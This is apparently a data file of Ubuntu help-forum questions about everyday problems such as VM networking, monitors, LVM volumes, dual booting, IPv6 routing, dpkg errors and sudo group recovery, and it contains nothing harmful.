497980	unable to connect to the internet on a vm ( nat & host only networks enabled )	host machine : ubuntu 12.04 lts guest machine : ubuntu 12.04 lts networking mode : nat + host network only . settings of my vm : cat /etc/network/interfaces : output : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.0.4 netmask 255.255.255.0 auto eth1 iface eth1 inet dhcp when i run : ping 8.8.8.8 , i get : connect : network is unreachable . note : i run the necessary things such as : sudo /etc/init.d/networking restart and sudo service network-interface restart interface=eth0/eth1 , and even sudo ifconfig eth0/eth1 down/up . i also edited the necessary files : /etc/hosts where i added my ip ( 10.0.0.4 ) and i added my dns namserver ( that i also definied for eth0 - i just do not want to post it here ) to /etc/resolv.conf . when i run route -n , i get this output : ifconfig gives me this : how could i connect to internet using a static address of my choice ?
497981	sony vaio external monitor problems	i am having problems enabling external monitor on my sony vaio notebook . it is being successfully detected , but when i try to enable second external monitor the screen glitches and lags ( it is like video driver is not working properly ) and nothing is displayed on second monitor . when i use external monitor only all seems to be better - no flickering and glitching , but when i try to extend the problems begin . i use proprietary fglrx-update drivers . here is the output of xrandr : screen 0 : minimum 320 x 200 , current 1440 x 900 , maximum 8192 x 8192 lvds1 connected primary 1440x900+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1600x900 59.9 + 1440x900 59.9* 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1440x900+0+0 ( normal left inverted right x axis y axis ) 476mm x 268mm 1920x1080 60.0 + 1680x1050 60.0 1280x1024 75.0 60.0 1440x900 75.0* 59.9 1280x960 60.0 1280x800 59.8 1152x864 75.0 1152x720 60.0 1024x768 75.1 60.0 832x624 74.6 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) and here is my xorg.conf : section `` serverlayout '' identifier `` amd-layout '' screen 0 `` amd-screen '' 0 0 screen `` aticonfig-screen [ 0 ] -1 '' rightof `` amd-screen '' endsection section `` module '' endsection section `` monitor '' identifier `` amd-monitor '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -1 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` intel '' driver `` intel '' option `` accelmethod '' `` uxa '' busid `` pci:0 @ 0:2:0 '' endsection section `` device '' identifier `` amd-device '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -1 '' driver `` fglrx '' busid `` pci:1:0:0 '' screen 1 endsection section `` screen '' identifier `` amd-screen '' device `` amd-device '' monitor `` amd-monitor '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -1 '' device `` aticonfig-device [ 0 ] -1 '' monitor `` aticonfig-monitor [ 0 ] -1 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection update i have managed to get it working over vga with the following command : xrandr -- output vga1 -- auto -- right-of lvds1 -- output vga1 -- scale 1.0001x1.0001 still , it does not work over hdmi .
497982	how to switch on the web camera in my dell laptop ( ubuntu os ) ?	eagerly waiting for my web camera to switch on . how to switch on my web-cam which is not get switch on automatically ?
497987	how to restart clickpad evdev driver	i am running a variant of evdev for the purpose of wheel emulation scrolling using the trackpoint and clickpad on a modern thinkpad . the driver works well but the scrolling emulation stops working after a suspend event . in order to try to have it working after resuming ( rather than having to reboot the computer ) , how can i restart evdev ? the driver ( https : //aur.archlinux.org/packages/xf86-input-evdev-trackpoint/ ) for arch was created by taegil bae ( esrevinu ) ( https : //bitbucket.org/esrevinu/xf86-input-evdev-trackpoint ) and a procedure ( https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-input-evdev/+bug/1246683/comments/40 ) was described by dalcde ( https : //launchpad.net/~dalcde ) for packaging the driver for ubuntu and updating . the procedure is as follows : sudo apt-get install git sudo apt-get build-dep xserver-xorg-input-evdev xserver-xorg-input-synaptics wget https : //aur.archlinux.org/packages/xf/xf86-input-evdev-trackpoint/xf86-input-evdev-trackpoint.tar.gz tar -xzf xf86-input-evdev-trackpoint.tar.gz git clone git : //git.debian.org/git/pkg-xorg/driver/xserver-xorg-input-evdev git clone git : //git.debian.org/git/pkg-xorg/driver/xserver-xorg-input-synaptics mv xf86-input-evdev-trackpoint arch mv xserver-xorg-input-evdev evdev mv xserver-xorg-input-synaptics synaptics cp synaptics/src/ { eventcomm.c , eventcomm.h , properties.c , synaptics.c , synapticsstr.h , synproto.c , synproto.h } evdev/src cp synaptics/include/synaptics-properties.h evdev/src cp arch/*.patch evdev cd evdev patch -p1 -i 0001-implement-trackpoint-wheel-emulation.patch patch -p1 -i 0008-disable-clickpad_guess_clickfingers.patch patch -p1 -i 0010-add-synatics-files-into-makefile.am.patch dpkg-buildpackage cd .. sudo dpkg -i xserver-xorg-input-evdev_*.deb sudo apt-get remove xserver-xorg-input-synaptics sudo mkdir /etc/x11/xorg.conf.d/ sudo cp arch/90-evdev-trackpoint.conf /etc/x11/xorg.conf.d
497992	how to remove google drive from ubuntu	can you tell me the command lines for removing google drive from ubuntu ? i do n't find it very useful since it does n't sync for some reason , i would rather use internet version only . i 've used this guide to install it .
497994	where to buy ubuntu desktop certified computers ?	i am trying to buy a new netbook , the asus x101ch . i noticed that it 's only compatible with ubuntu desktop if you buy it pre installed from the manufacturer . i ca n't find anybody who sells it pre installed , and i 'm also wondering if it will work if i download and install it with some modifications ? i really want to run ubuntu on this little machine . thanks
497998	how can i install adobe flash media server on ubuntu 12.04 lts 32-bit system	i need to install adobe flash media server on my ubuntu 12.04 lts 32-bit system , how can i do it ?
497999	cdma modem not detecting 14.04	cdma modem is not detecting . modem details : harvilon model : ed269
498000	adding space to the existing volume group	i need to extend my lv in /home partition to another 10gb , but there is no enough space in my vg . /dev/mapper/vg1-lv_home 23g 20g 2.3g 90 % /home the volume group and physical volume details are mentioned below , -- - volume group -- - vg name vg1 system id format lvm2 metadata areas 1 metadata sequence no 7 vg access read/write vg status resizable max lv 0 cur lv 6 open lv 6 max pv 0 cur pv 1 act pv 1 vg size 49.81 gib pe size 4.00 mib total pe 12751 alloc pe / size 11919 / 46.56 gib free pe / size 832 / 3.25 gib vg uuid pduum2-ig0l-glng-9g0m-inkz-8z7x-n07q8w pvdisplay -- - physical volume -- - pv name /dev/sda2 vg name vg1 pv size 49.81 gib / not usable 4.00 mib allocatable yes pe size 4.00 mib total pe 12751 free pe 832 allocated pe 11919 pv uuid wnpkai-x6h6-cdcj-ew9q-ha6e-6num-9tnwyx kindly provide me the steps of adding the free space from the lun to the existing volume group , so that i can able to extend my lv in /home partition .
498002	dual boot . no boot option !	i just installed ubuntu 14.04 from a live cd and when it was finished it restarted but did n't give me the option to boot windows ... ubuntu booted automatic . i ran the command : sudo parted /dev/sda/ print and here are the results : drenii @ drenii : ~ $ sudo parted /dev/sda print [ sudo ] password for drenii : model : ata st320lt012-9ws14 ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary ntfs boot 2 106mb 186gb 186gb primary ntfs 3 186gb 188gb 2499mb extended 5 186gb 188gb 2499mb logical linux-swap ( v1 ) 4 188gb 320gb 132gb primary ext4 someone please help as i need windows .
498003	how to install gimp toolbox photoshop theme	i want to unpack the zip file ( from gimp toolbox like photoshop ) to the path /usr/share/gimp/2.0/themes/ but i need administrator rights to unpack that zip file . how can i proceed ? link : http : //gnome-look.org/content/show.php/gimp+toolbox+like+photoshop ? content=159293 i am completely new in ubuntu . thanks .
498004	building html cordova app and running directly on physical device	i 've just finished to create simple html/cordova application on ubuntu . it works fine on the desktop . i just want now to build it , copy to real ubuntu device and run it ( not from sdk ) . which files should i copy after the build and how can i run the application on the device ? thanks .
498006	`` unable to find a medium containing a live file system '' error while installing from iso	i have a dell inspiron 1525 running windows 7 and i want to install ubuntu 14.04 32-bit alongside it . the laptop has 2gb ram . however , every time i try to boot the installation i get the error : '' ( initramfs ) unable to find a medium containing a live file system '' i 'm trying to boot from the bootable iso that ubuntu created , because i do n't have a cd . i checked the md5sum and changed the bios settings to ahci , but no luck . i 'm new to ubuntu so any help would be appreciated . thanks .
498008	how to hide minimal bash-like line editing is supported	here 's the problem . i use grub to boot into windows 8 and ubuntu . this afternoon i update the bios . after that every time i turn on/ reboot my pc , `` minimal bash-like line editing is supported '' message comes out . but i can simply type exit and load into grub menu to choose starting windows or ubuntu os . it is a bit annoying every time i have to type exit when i turn on my pc or reboot , how can i hide `` minimal bash-like line editing is supported '' ?
498011	gaming mouse not working	i 'm pretty sure my new mouse ( 1life gm stormy ) works on windows , but it does n't seem to be working on ubuntu . the cursor doesnt move and the mouse 's led just blinks . what can i do ? edit : output of lsusb : bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 002 : id 0cf3:311d atheros communications , inc . bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0461:4de7 primax electronics , ltd webcam bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 002 : id 04d9:1603 holtek semiconductor , inc . keyboard bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
498016	ipv6 network is unreachable . until reboot	i 've setup ipv6 on my ubuntu 14.04 server . everything is working.. until all of a sudden ( have n't found the trigger ) a ping6 2001:4860:4860 : :8888 ( google nameserver 8.8.8.8 ) returns network unreachable . when i reboot the server it all starts working again . and the ping resolves . my /etc/network/interfaces : # the loopback network interface auto lo iface lo inet loopback iface lo inet6 loopback # the primary network interface auto eth0 iface eth0 inet static address 95.xxx.44.xxx netmask 255.255.255.0 network 95.xxx.44.0 broadcast 95.xxx.44.255 gateway 95.xxx.44.254 dns-nameservers 8.8.8.8 8.8.4.4 dns-search localdomain iface eth0 inet6 static pre-up modprobe ipv6 address 2001 : xxxx:4300 : xxxx:0008 : :c01a netmask 64 gateway 2001 : xxxx:4300 : xxxx : :1 dns-nameservers 2001:4860:4860 : :8888 2001:4860:4860 : :8844 dns-search localdomain i have found that my /run/network/ifstate is sometimes missing the eth0=eth0 but with or without it the problems occur . edit : both where when everything was not working . output of ip -6 addr : 1 : lo : < loopback , up , lower_up > mtu 65536 inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qlen 1000 inet6 2001 : xxxx:4300 : xxxx:8 : :69/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :68/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :67/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :66/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :65/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :64/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :63/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :62/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :61/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :60/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :59/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :58/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :57/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :56/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :55/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :54/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :53/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :52/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :51/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :50/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :49/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :48/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :47/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :46/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :45/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :44/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :43/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :42/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :41/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :40/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :39/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :38/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :37/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :36/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :35/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :34/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :33/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :32/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :31/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :30/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :29/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :28/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :27/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :26/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :25/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :24/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :23/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :22/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :21/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :20/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :19/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :18/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :17/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :16/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :15/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :14/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :13/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :12/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :11/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :10/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :9/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :8/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :7/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :6/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :5/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :4/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :3/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :2/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :1/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :/64 scope global valid_lft forever preferred_lft forever inet6 2001 : xxxx:4300 : xxxx:8 : :c01a/64 scope global valid_lft forever preferred_lft forever inet6 fe80 : :250 : xxxx : xxxx:9b1/64 scope link valid_lft forever preferred_lft forever and output of ip -6 route : 2001 : xxxx:4300 : xxxx : :/64 dev eth0 proto kernel metric 256 fe80 : :/64 dev eth0 proto kernel metric 256 edit2 : output of ip -6 route when networking was working : 2001 : xxxx:4300 : xxxx : :/64 dev eth0 proto kernel metric 256 fe80 : :/64 dev eth0 proto kernel metric 256 default via fe80 : :2d0 : ff : fefc:3000 dev eth0 proto ra metric 1024 expires 1772sec default via fe80 : :2d0 : ff : fefb:9000 dev eth0 proto ra metric 1024 expires 1772sec
498017	ubuntu server setup help : sda sdb have changed ? how to know i 'm making shared folders on the right drive ?	please help , i will be forever grateful ! i 've built a system to use as a file server , with one 120gb ssd and one 4tb hdd . i 've installed ubuntu server and i want to have the os on the ssd and the files on the hdd . during the installation process the ssd was sda and the hdd was sdb . during install i created 3 new partitions . one 112gb partition on the 120gb ssd with mount point / , one 8gb swap area on the 120gb ssd and one 4tb partition on the 4tb hdd with mount point /home . ( i installed grub boot loader on sda , which was the ssd ) how can i check that this is all set up correctly ? when i type in sudo fdisk -l it says '' disk /dev/sda : 4000gb '' ( this was sdb during install ? ! ? ) `` /dev/sda1 : partition 1 does not start on a physical sector boundary . ( i did n't create a 2nd partition on the hdd though ? ? ) and it also says '' /dev/sdb : 120gb ( so my ssd has somehow changed from sda to sdb ? ) disk /dev/mapper/cryptswap1 : 8033md disk /dev/mapper/cryptswap1 doesnt contain a valid partition table '' so does this mean the swap area i made didnt work ? and my sda and sda have somehow swapped names ? how can i confirm the os is installed on the ssd and then create some directories like 'movies ' music ' 'photos ' etc on the hdd so i can them share them across my network . i 've just installed openssh-server and samba and stuff and now the tutorial says to cd to root directory and then use mkdir to create my folders . but will this create them on the hdd like i want ? or on the ssd ? so confused ! if someone could tell me the commands to type in to see which drive the os is installed on and the commands to create directories on the hdd it would be much much appreciated . thank you
498018	how to change the dns server across network interfaces ?	the only consistent solution for changing your dns server is to change it in each individual network interface . this means for ethernet and for each wireless network you use . i 'm looking for a way to set dns servers globally . no matter what interface i 'm using . i found several solutions but most of them are commented on that they only work on certain conditions . because i do n't really know a way to test if the dns settings were succesfully changed , i 'm looking for a way that definitely works on ubuntu 14.04 lts .
498024	wpa2 wifi password constrained to 5 or 13 characters	first of all , i found both of these pages : wifi only accepts passwords of 5 or 13 characters can not change wifi settings , stuck on wep security both look similar to my problem , but seem associated with wep , not wpa or wpa2 . i 've double-checked that my wifi router is set for wpa2 , and it is . i do have a ( perhaps rather obvious ) workaround , which is to set a 13 character wifi password on my router . i would rather have a longer wifi password . i could also set 5 character password ; maybe `` pwnme '' would work ? : ) if anyone 's interested in investigating/solving the problem , i 'm happy to try things . i 'm running lubuntu 12.04 , and the issue has just started to affect me . i have seen the issue before in 14.04 on similar-ish hardware ( in terms of age and capability ) . it did n't appear in 12.04 until i applied a recent ( last week or so ? ) update . my guess is someone ported some changes from 14.04 down in to 12.04 because it 's also an lts release ? i 'm hoping that i 'll get an e-mail if others reply here ... i will try to monitor , too . all thoughts and suggestions gratefully received ...
498027	the menu-bar of any application should allways be displayed	how can i allways show the menu-bar ( file , edit ... ) of every application ? not only when i move the pointer to the top , that is cumbersome . edit : but now i ( also ) have to move the pointer to the top of the window to show the menu-bar . i want that the menu-bar is allways shown , not when i move the pointer . thanks .
498032	how to install brother mfc-j6520dw printer on ubuntu 14.04	i 'm having ubuntu 14.04 lst system in my computer and a new printer ( brother mfc-j6520dw ) . i ca n't get them to work together because the ubuntu 's system do n't give the driver information to load to my computer . further information : the computer and printer should work in the wireless mode . what should i do to get the printer work ? do anybody know the answer or solve the problem ?
498033	it ask me for password when i try to open disk and connect to a netwrk	that 's the following problem it is asking me for password i have no idea which password i never kept the password except user password
498035	successful installing packages but dpkg has error	happy ramadan i 'm live in iran and some corporation ban us like oracle so i installed oracle java sdk 8 manually and after it my `` dpkg '' has been showing error always . no different between installation packages . each packages from `` ubuntu software center '' or `` apt-get '' install successfully but some error has been shown and i 'm very confused and angry somebody tell me what 's wrong in my ubuntu ? the error is : package operation failed the installation or removal of a software package failed -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- details -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- installarchives ( ) failed : selecting previously unselected package gnome-hearts . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 238764 files and directories currently installed . ) preparing to unpack ... /gnome-hearts_0.3-2.1ubuntu1_amd64.deb ... unpacking gnome-hearts ( 0.3-2.1ubuntu1 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ( 3.54ubuntu1 ) ... setting up oracle-java7-installer ( 7u60-0~webupd8~0 ) ... downloading oracle java 7 ... -- 2014-07-15 14:57:49 -- http : //download.oracle.com/otn-pub/java/jdk/7u60-b19/jdk-7u60-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 82.178.158.11 , 82.178.158.24 connecting to download.oracle.com ( download.oracle.com ) |82.178.158.11|:80 ... connected . http request sent , awaiting response ... 403 forbidden 2014-07-15 14:57:51 error 403 : forbidden . download failed oracle jdk 7 is not installed . dpkg : error processing package oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up oracle-java8-installer ( 8u5-1~webupd8~3 ) ... downloading oracle java 8 ... -- 2014-07-15 14:57:52 -- http : //download.oracle.com/otn-pub/java/jdk/8u5-b13/jdk-8u5-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 82.178.158.24 , 82.178.158.11 connecting to download.oracle.com ( download.oracle.com ) |82.178.158.24|:80 ... connected . http request sent , awaiting response ... 403 forbidden 2014-07-15 14:57:52 error 403 : forbidden . download failed oracle jdk 8 is not installed . dpkg : error processing package oracle-java8-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of oracle-java8-set-default : oracle-java8-set-default depends on oracle-java8-installer ; however : package oracle-java8-installer is not configured yet . dpkg : error processing package oracle-java8-set-default ( -- configure ) : dependency problems - leaving unconfigured setting up gnome-hearts ( 0.3-2.1ubuntu1 ) ... no apport report written because the error message indicates its a followup error from a previous failure . processing triggers for python-support ( 1.0.15 ) ... errors were encountered while processing : oracle-java7-installer oracle-java8-installer oracle-java8-set-default error in function : setting up oracle-java7-installer ( 7u60-0~webupd8~0 ) ... downloading oracle java 7 ... -- 2014-07-15 14:57:55 -- http : //download.oracle.com/otn-pub/java/jdk/7u60-b19/jdk-7u60-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 82.178.158.11 , 82.178.158.24 connecting to download.oracle.com ( download.oracle.com ) |82.178.158.11|:80 ... connected . http request sent , awaiting response ... 403 forbidden 2014-07-15 14:57:57 error 403 : forbidden . download failed oracle jdk 7 is not installed . dpkg : error processing package oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up oracle-java8-installer ( 8u5-1~webupd8~3 ) ... downloading oracle java 8 ... -- 2014-07-15 14:57:58 -- http : //download.oracle.com/otn-pub/java/jdk/8u5-b13/jdk-8u5-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 82.178.158.24 , 82.178.158.11 connecting to download.oracle.com ( download.oracle.com ) |82.178.158.24|:80 ... connected . http request sent , awaiting response ... 403 forbidden 2014-07-15 14:57:58 error 403 : forbidden . download failed oracle jdk 8 is not installed . dpkg : error processing package oracle-java8-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of oracle-java8-set-default : oracle-java8-set-default depends on oracle-java8-installer ; however : package oracle-java8-installer is not configured yet . dpkg : error processing package oracle-java8-set-default ( -- configure ) : dependency problems - leaving unconfigured
498038	ubuntu says usb harddrive should be checked for errors	i use lubuntu 14.04 without a display manager . after logging in on tty1 i get the message *** /dev/sdb should be checked for errors *** i have run fsck on the harddrive ( sudo fsck /dev/sdb ) but i still get the warning upon login . any clues ?
498046	perf not found for kernel 3.13.0-031300	i am trying to install perf on the ubuntu 13.10 . however i am getting error : perf not found for kernel 3.13.0-031300 you may need to install linux-tools-3.13.0-031300-generic i have tried the following commands to resolve it but nothing is working out . sudo apt-get install linux-tools linux-generic sudo reboot sudo apt-get install linux-tools-common linux-base sudo apt-get install linux-tools sudo apt-get install linux-tools-common sudo apt-get install linux-tools sudo apt-get install linux-tools-common linux-base sudo apt-get upgrade nothing seems to be working .
498049	how to make my password unchangeable	how do i make my password unchangeable by another administrator in my system on ubuntu 12.04 ( precise pangolin ) ? i am an administrator in my machine and i do n't want another administrator to reset my password . is it possible ?
498050	no hard drive detected lubuntu 12.04 ?	i 'm trying to install lubuntu 12.04 on this old computer i got from someone because they 're planning on using it for college but it 's old as holy flip . it 's a dell latitude x300 with a pentium m processor from 2003 i think it has like 128megabytes of ram . it originally came with windows xp professional sp1 i think . anyway , first i tried installing lubuntu 14.04 but it said it could n't because of this error : this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . i found out the the fix is to use an older version of ubuntu that supported non pae cpu 's , so i tried lubuntu 12.04 which does not detect my drive at all . i tried using puppylinux , but puppylinux gives an error , it detects the drive as a 30gb volume but it wo n't let me use it because it does n't have a partition table and it wo n't let me create one either ... . anyone know how to get linux installed on one of these ? this computer is so old i know people have done it , i 've seen posts about it , but there 's no tutorial or anything . i tried booting off of usb and for some reason it does n't like my usb 's , so i had to boot off a live usb . i appologize for this block of text but i have no idea , i 'm really stumped .
498054	resize primary partition	i just installed ubuntu 14.04 on a 500gb hdd and i want to make another partition just for storage . i tried with gpart but i ca n't resize it . how can i do this ?
498055	i ca n't add myself ( default user ) in sudo group in ubuntu	i accidentally changed my primary group using the following command . sudo usermod -g localgroup shantanu # shantanu is my username i interrupted this process as soon as i realize what is happening . as a result sudo was working but pkexe was affected . so i tried to restore my primary group using the same command sudo usermod -g shantanu shantanu then i reboot my system . now i ca n't use sudo . so i open root shell ( recovery ) and run the following the command usermod -g sudo shantanu but when i log in back to my account and run groups command , sudo is not listed . also i ca n't use sudo . finally what i did , add my user in visudo but i do n't want to do this . how can i add my user into sudo group ? thanks in advance . system : ubuntu 14.04 64bit ( up to date )
498056	ubuntu 14.04 lts login issue	after restarting my pc , i am not able to see my users on screen . only the guest session appears , but i am not able to log in . when i click on the guest session login , screen turns black and returns to the login screen .
